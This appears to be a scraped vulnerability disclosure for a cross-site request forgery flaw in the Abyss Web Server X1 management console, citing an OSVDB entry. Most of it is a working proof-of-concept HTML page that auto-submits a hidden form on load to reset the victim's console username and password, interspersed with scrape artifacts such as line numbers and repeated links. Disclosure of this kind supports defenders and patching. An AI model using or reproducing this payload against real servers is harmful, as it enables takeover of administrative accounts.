1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
http://osvdb.org/show/osvdb/64693 <http://osvdb.org/show/osvdb/64693> http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html : Abyss Web Server X1 XSRF<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html> A cross-site request forgery vunlerability in the Abyss Web Server X1<http://www.aprelium.com/abyssws/download.php> management console can be exploited to change both the username and password of the logged in user. PoC: view plain<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#> print<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#> ?<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#> 1. <html> 2. <body onload="document.forms[0].submit()"> 3. <form method="post" action=" http://localhost:9999/console/credentials"> 4. <input type="hidden" name="/console/credentials/login" 5.value="new_username" /> 6. <input type="hidden" name= "/console/credentials/password/$pass1" 7.value="new_password" /> 8. <input type="hidden" name= "/console/credentials/password/$pass2" 9.value="new_password" /> 10. <input type="hidden" name="/console/credentials/bok" 11.value="%C2%A0%C2%A0OK%C2%A0%C2%A0" /> 12. </form> 13. </body> 14. </html> <http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html> |